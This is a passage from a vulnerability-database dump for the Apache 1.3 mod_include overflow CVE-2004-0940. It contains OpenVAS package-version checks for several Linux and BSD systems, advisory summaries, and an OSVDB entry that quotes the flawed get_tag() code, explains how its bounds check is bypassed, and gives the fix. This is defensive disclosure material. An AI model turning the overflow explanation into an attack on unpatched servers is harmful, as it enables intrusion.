\n\nif(description)\n{\n script_id(54724);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_bugtraq_id(11471);\n script_cve_id(\"CVE-2004-0940\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200411-03 (apache)\");\n\n\n\n 
script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-www/apache\", unaffected: make_list(\"ge 1.3.32-r1\"), vulnerable: make_list(\"lt 1.3.32-r1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:10:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0940"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-15T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:52314", "href": "http://plugins.openvas.org/nasl.php?oid=52314", "type": "openvas", "title": "FreeBSD Ports: apache", "sourceData": "#\n#VID 6e6a6b8a-2fde-11d9-b3a2-0050fc56d258\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n apache\n apache+mod_ssl\n apache+mod_ssl+ipv6\n apache+mod_perl\n apache+ipv6\n apache+ssl\n ru-apache\n ru-apache+mod_ssl\n\nCVE-2004-0940\nBuffer overflow in the get_tag function in mod_include for Apache\n1.3.x to 1.3.32 allows local users who can create SSI documents to\nexecute arbitrary code as the apache user via SSI (XSSI) documents\nthat trigger a length calculation error.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.securitylab.ru/48807.html\nhttp://www.vuxml.org/freebsd/6e6a6b8a-2fde-11d9-b3a2-0050fc56d258.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(52314);\n script_version(\"$Revision: 4075 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-15 15:13:05 +0200 (Thu, 15 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_bugtraq_id(11471);\n script_cve_id(\"CVE-2004-0940\");\n script_tag(name:\"cvss_base\", 
value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: apache\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"apache\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.33\")<0) {\n txt += 'Package apache version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.32+2.8.21_1\")<0) {\n txt += 'Package apache+mod_ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.32+2.8.21_1\")<0) {\n txt += 'Package apache+mod_ssl+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_perl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.31\")<=0) {\n txt += 'Package apache+mod_perl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.33\")<0) {\n txt += 'Package apache+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+ssl\");\nif(!isnull(bver) && 
revcomp(a:bver, b:\"1.3.29.1.55\")<=0) {\n txt += 'Package apache+ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ru-apache\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.33+30.21\")<0) {\n txt += 'Package ru-apache version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ru-apache+mod_ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.33+30.21+2.8.22\")<0) {\n txt += 'Package ru-apache+mod_ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0940", "CVE-2004-0492"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2004-305-01.", "modified": "2019-03-15T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:136141256231053902", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231053902", "type": "openvas", "title": "Slackware Advisory SSA:2004-305-01 apache+mod_ssl ", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2004_305_01.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.53902\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_cve_id(\"CVE-2004-0940\", \"CVE-2004-0492\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 14202 $\");\n script_name(\"Slackware Advisory SSA:2004-305-01 apache+mod_ssl \");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(8\\.1|9\\.0|9\\.1|10\\.0)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2004-305-01\");\n\n script_tag(name:\"insight\", value:\"New apache packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\nand -current to fix a security issue. Apache has been upgraded to\nversion 1.3.33 which fixes a buffer overflow which may allow local\nusers to execute arbitrary code as the apache user.\n\nThe mod_ssl package has also been upgraded to version 2.8.22_1.3.33.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2004-305-01.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"apache\", ver:\"1.3.33-i386-1\", rls:\"SLK8.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.22_1.3.33-i386-1\", rls:\"SLK8.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apache\", ver:\"1.3.33-i386-1\", rls:\"SLK9.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.22_1.3.33-i386-1\", rls:\"SLK9.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apache\", ver:\"1.3.33-i486-1\", rls:\"SLK9.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.22_1.3.33-i486-1\", rls:\"SLK9.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apache\", ver:\"1.3.33-i486-1\", rls:\"SLK10.0\")) != NULL) {\n report += 
res;\n}\nif((res = isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.22_1.3.33-i486-1\", rls:\"SLK10.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:50:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0940", "CVE-2004-0492"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2004-305-01.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:53902", "href": "http://plugins.openvas.org/nasl.php?oid=53902", "type": "openvas", "title": "Slackware Advisory SSA:2004-305-01 apache+mod_ssl", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2004_305_01.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New apache packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\nand -current to fix a security issue. Apache has been upgraded to\nversion 1.3.33 which fixes a buffer overflow which may allow local\nusers to execute arbitrary code as the apache user.\n\nThe mod_ssl package has also been upgraded to version 2.8.22_1.3.33.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2004-305-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2004-305-01\";\n \nif(description)\n{\n script_id(53902);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2004-0940\", \"CVE-2004-0492\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2004-305-01 apache+mod_ssl \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"apache\", ver:\"1.3.33-i386-1\", rls:\"SLK8.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.22_1.3.33-i386-1\", rls:\"SLK8.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apache\", ver:\"1.3.33-i386-1\", rls:\"SLK9.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.22_1.3.33-i386-1\", rls:\"SLK9.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apache\", ver:\"1.3.33-i486-1\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.22_1.3.33-i486-1\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apache\", ver:\"1.3.33-i486-1\", rls:\"SLK10.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"mod_ssl\", ver:\"2.8.22_1.3.33-i486-1\", rls:\"SLK10.0\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:55:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0885", "CVE-2004-0940"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. 
One or more of the following packages\nare affected:\n\n apache\n mod_ssl\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5014050 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:65132", "href": "http://plugins.openvas.org/nasl.php?oid=65132", "type": "openvas", "title": "SLES9: Security update for apache", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5014050.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for apache\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. 
One or more of the following packages\nare affected:\n\n apache\n mod_ssl\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5014050 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65132);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2004-0940\", \"CVE-2004-0885\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"SLES9: Security update for apache\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache\", rpm:\"apache~1.3.29~71.15\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:39:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0885", "CVE-2004-0940"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache\n mod_ssl\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5014050 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:136141256231065132", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065132", "type": "openvas", "title": "SLES9: Security update for apache", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5014050.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for apache\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. 
One or more of the following packages\nare affected:\n\n apache\n mod_ssl\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5014050 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65132\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2004-0940\", \"CVE-2004-0885\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"SLES9: Security update for apache\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache\", rpm:\"apache~1.3.29~71.15\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "httpd": [{"lastseen": "2016-09-26T21:39:38", "bulletinFamily": "software", "cvelist": ["CVE-2004-0940"], "description": "\n\nA buffer overflow in mod_include could allow a local user who\nis authorised to create server side include (SSI) files to gain\nthe privileges of a httpd child.\n\n", "edition": 1, "modified": "2004-10-28T00:00:00", "published": "2004-10-21T00:00:00", "id": "HTTPD:D1741B6A255EEEFE57FCBB18F638BF8D", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 1.3.33: mod_include overflow", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-12-24T14:26:52", "bulletinFamily": "software", "cvelist": ["CVE-2004-0940"], "description": "\n\nA buffer overflow in mod_include could allow a local user who\nis authorised to create server side include (SSI) files to gain\nthe privileges of a httpd child.\n\n", "edition": 5, "modified": "2004-10-21T00:00:00", "published": "2004-10-21T00:00:00", "id": "HTTPD:88FE130D4F7C240484D2151167EA668E", "href": 
"https://httpd.apache.org/security_report.html", "title": "Apache Httpd < None: mod_include overflow", "type": "httpd", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:06", "bulletinFamily": "software", "cvelist": ["CVE-2004-0940"], "edition": 1, "description": "## Vulnerability Description\nA local overflow exists in the Apache HTTP server mod_include module (compiled in by default). The get_tag() function in mod_include.c contains a logic flaw resulting in a buffer overflow. A local attacker who is authorized to create server side include (SSI) files, can create a specially crafted HTML file and cause arbitrary code execution with the privileges of the httpd child process, resulting in a loss of integrity.\n## Technical Description\nThe overflow exists in the get_tag() function in mod_include.c:\nstatic char *get_tag(pool *p, FILE *in, char *tag, int tagbuf_len, int dodecode)\n{\n...\n term = c;\n while (1) {\n GET_CHAR(in, c, NULL, p);\n[1] if (t - tag == tagbuf_len) {\n *t = '\\0';\n return NULL;\n }\n/* Want to accept \\\" as a valid character within a string. */\n if (c == '\\\\') {\n[2] *(t++) = c; /* Add backslash */\n GET_CHAR(in, c, NULL, p);\n if (c == term) { /* Only if */\n[3] *(--t) = c; /* Replace backslash ONLY for terminator */\n }\n }\n else if (c == term) {\n break;\n }\n[4] *(t++) = c;\n }\n *t = '\\0';\n...\n}\n\nThe first check (labeled [1]) is used to find the end of the tag buffer. However, the check could be skipped if conditions [2] and [4] are met at the same time condition [3] is not. Thus, an attacker is able to craft a malformed HTML file that overwrites a static buffer causing arbitrary code execution to occur with privileges of the HTTP server child process.\n## Solution Description\nUpgrade to Apache version 1.3.33 or higher, as it has been reported to fix this vulnerability. 
It is also possible to correct the flaw by implementing the following workaround(s): \n\nIn the get_tag() function (mod_include.c), the following line should be changed from:\nif (t - tag == tagbuf_len) {\nto\nif (t - tag >= tagbuf_len-1) {\n## Short Description\nA local overflow exists in the Apache HTTP server mod_include module (compiled in by default). The get_tag() function in mod_include.c contains a logic flaw resulting in a buffer overflow. A local attacker who is authorized to create server side include (SSI) files, can create a specially crafted HTML file and cause arbitrary code execution with the privileges of the httpd child process, resulting in a loss of integrity.\n## References:\nVendor URL: http://httpd.apache.org/\nVendor URL: http://minimal.cx/mod_include.php\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200411-03.xml)\n[Vendor Specific Advisory URL](http://www.debian.org/security/2004/dsa-594)\n[Vendor Specific Advisory URL](http://itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX01113)\n[Vendor Specific Advisory URL](http://www.apache.org/dist/httpd/Announcement.html)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2005-011_RHSA-2004-586.pdf)\n[Vendor Specific Advisory URL](http://www-1.ibm.com/support/docview.wss?uid=swg24009600)\n[Vendor Specific Advisory URL](http://www.vmware.com/support/kb/enduser/std_adp.php?p_sid=FsNALBWh&p_lva=&p_faqid=1561)\n[Vendor Specific Advisory URL](http://sunsolve.sun.com/search/document.do?assetkey=1-26-102197-1)\nSecurity Tracker: 1011783\n[Secunia Advisory ID:12898](https://secuniaresearch.flexerasoftware.com/advisories/12898/)\n[Secunia Advisory ID:13880](https://secuniaresearch.flexerasoftware.com/advisories/13880/)\n[Secunia Advisory ID:17311](https://secuniaresearch.flexerasoftware.com/advisories/17311/)\n[Secunia Advisory ID:13042](https://secuniaresearch.flexerasoftware.com/advisories/13042/)\n[Secunia Advisory 
ID:13068](https://secuniaresearch.flexerasoftware.com/advisories/13068/)\n[Secunia Advisory ID:15365](https://secuniaresearch.flexerasoftware.com/advisories/15365/)\n[Secunia Advisory ID:13115](https://secuniaresearch.flexerasoftware.com/advisories/13115/)\n[Secunia Advisory ID:13229](https://secuniaresearch.flexerasoftware.com/advisories/13229/)\n[Secunia Advisory ID:16943](https://secuniaresearch.flexerasoftware.com/advisories/16943/)\n[Secunia Advisory ID:19073](https://secuniaresearch.flexerasoftware.com/advisories/19073/)\n[Secunia Advisory ID:13303](https://secuniaresearch.flexerasoftware.com/advisories/13303/)\nRedHat RHSA: RHSA-2005:816\nOther Advisory URL: http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.533785\nOther Advisory URL: http://www.suse.de/de/security/2004_01_sr.html\nOther Advisory URL: http://www-1.ibm.com/support/docview.wss?rs=0&uid=isg1SSRVHMCHMC_S081514_252&loc=en_US&cs=utf-8&cc=us&lang=all\nOther Advisory URL: http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:134\nOther Advisory URL: http://www.trustix.net/errata/2004/0056/\n[Nessus Plugin ID:15554](https://vulners.com/search?query=pluginID:15554)\n[Nessus Plugin ID:15606](https://vulners.com/search?query=pluginID:15606)\nISS X-Force ID: 17785\nGeneric Exploit URL: 